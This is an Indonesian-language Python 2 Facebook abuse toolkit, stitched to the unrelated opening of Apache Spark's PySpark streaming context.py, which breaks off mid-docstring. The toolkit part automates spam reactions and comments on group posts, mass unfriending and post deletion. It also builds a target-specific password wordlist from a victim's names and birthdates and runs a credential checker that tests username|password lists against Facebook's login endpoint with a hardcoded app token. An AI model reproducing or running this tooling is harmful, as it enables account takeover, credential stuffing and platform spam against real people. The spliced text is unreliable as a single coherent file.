raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import sys
from py4j.java_gateway import java_import, JavaObject
from pyspark import RDD, SparkConf
from pyspark.serializers import NoOpSerializer, UTF8Deserializer, CloudPickleSerializer
from pyspark.context import SparkContext
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.dstream import DStream
from pyspark.streaming.util import TransformFunction, TransformFunctionSerializer
__all__ = ["StreamingContext"]
def _daemonize_callback_server():
"""
Hack Py4J to daemonize the callback server.
The callback server thread has daemon=False, so it will block the driver
from exiting if it is not shut down. The following code replaces `start()`
of CallbackServer with a new version that sets daemon=True for this
thread.
It also updates the port number (0) with the real port.
"""
# TODO: create a patch for Py4J
import socket
import py4j.java_gateway
logger = py4j.java_gateway.logger
from py4j.java_gateway import Py4JNetworkError
from threading import Thread
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,
1)
try:
self.server_socket.bind((self.address, self.port))
if not self.port:
# update port with real port
self.port = self.server_socket.getsockname()[1]
except Exception as e:
msg = 'An error occurred while trying to start the callback server: %s' % e
logger.exception(msg)
raise Py4JNetworkError(msg)
# Maybe the thread needs to be cleaned up?
self.thread = Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
py4j.java_gateway.CallbackServer.start = start
class StreamingContext(object):
"""
Main entry point for Spark Streaming functionality. A StreamingContext
represents the connection to a Spark cluster, and can be used to create
L{DStream}s from various input sources. It can be created from an existing L{SparkContext}.
After creating and transforming DStreams, the streaming computation can
be started and stopped using `context.start()` and `context.stop()`,
respectively. `context.awaitTermination()` allows the current thread
to wait for the termination of the context by `stop()` or by an exception.
"""
_transformerSerializer = None
def __init__(self, sparkContext, batchDuration=None, jssc=None):
"""
Create a new StreamingContext.
@param sparkContext: L{SparkContext} object.
@param batchDuration: the time interval (in seconds) at which streaming
data will be divided into batches
"""
self._sc = sparkContext
self._jvm = self._sc._jvm
self._jssc = jssc or self._initialize_context(self._sc, batchDuration)
def _initialize_context(self, sc, duration):
self._ensure_initialized()
return self._jvm.JavaStreamingContext(sc._jsc, self._jduration(duration))
def _jduration(self, seconds):
"""
Create Duration object given number of seconds
"""
return self._jvm.Duration(int(seconds * 1000))
@classmethod
def _ensure_initialized(cls):
SparkContext._ensure_initialized()
gw = SparkContext._gateway
java_import(gw.jvm, "org.apache.spark.streaming.*")
java_import(gw.jvm, "org.apache.spark.streaming.api.java.*")
java_import(gw.jvm, "org.apache.spark.streaming.api.python.*")
# start callback server
# getattr will fallback to JVM, so we cannot test by hasattr()
if "_callback_server" not in gw.__dict__:
_daemonize_callback_server()
# use random port
gw._start_callback_server(0)
# gateway with real port
gw._python_proxy_port = gw._callback_server.port
# get the GatewayServer object in JVM by ID
jgws = JavaObject("GATEWAY_SERVER", gw._gateway_client)
# update the port of CallbackClient with real port
gw.jvm.PythonDStream.updatePythonGatewayPort(jgws, gw._python_proxy_port)
# register serializer for TransformFunction
# it happens before creating SparkContext when loading from checkpointing
cls._transformerSerializer = TransformFunctionSerializer(
SparkContext._active_spark_context, CloudPickleSerializer(), gw)
@classmethod
def getOrCreate(cls, checkpointPath, setupFunc):
"""
Either recreate a StreamingContext from checkpoint data or create a new StreamingContext.
If checkpoint data exists in the provided `checkpointPath`, then StreamingContext will be
recreated from the checkpoint data. If the data does not exist, then the provided setupFunc
will be used to create a JavaStreamingContext.
@param checkpointPath: Checkpoint directory used in an earlier JavaStreamingContext program
@param setupFunc: Function to create a new JavaStreamingContext and setup DStreams
"""
# TODO: support checkpoint in HDFS
if not os.path.exists(checkpointPath) or not os.listdir(checkpointPath):
ssc = setupFunc()
ssc.checkpoint(checkpointPath)
return ssc
cls._ensure_initialized()
gw = SparkContext._gateway
try:
jssc = gw.jvm.JavaStreamingContext(checkpointPath)
except Exception:
print("failed to load StreamingContext from checkpoint", file=sys.stderr)
raise
jsc = jssc.sparkContext()
conf = SparkConf(_jconf=jsc.getConf())
sc = SparkContext(conf=conf, gateway=gw, jsc=jsc)
# update ctx in serializer
SparkContext._active_spark_context = sc
cls._transformerSerializer.ctx = sc
return StreamingContext(sc, None, jssc)
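# A hedged sketch of driving getOrCreate (the checkpoint directory and the
# setup function below are assumptions for illustration):
#
#   def create_context():
#       sc = SparkContext(appName="CheckpointedApp")
#       ssc = StreamingContext(sc, 5)
#       ssc.checkpoint("/tmp/streaming-checkpoint")
#       # ... define DStreams and output operations here ...
#       return ssc
#
#   ssc = StreamingContext.getOrCreate("/tmp/streaming-checkpoint", create_context)
#   ssc.start()
#   ssc.awaitTermination()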
@property
def sparkContext(self):
"""
Return SparkContext which is associated with this StreamingContext.
"""
return self._sc
def start(self):
"""
Start the execution of the streams.
"""
self._jssc.start()
def awaitTermination(self, timeout=None):
"""
Wait for the execution to stop.
@param timeout: time to wait in seconds
"""
if timeout is None:
self._jssc.awaitTermination()
else:
self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))
def awaitTerminationOrTimeout(self, timeout):
"""
Wait for the execution to stop. Return `true` if it's stopped; or
throw the reported error during the execution; or `false` if the
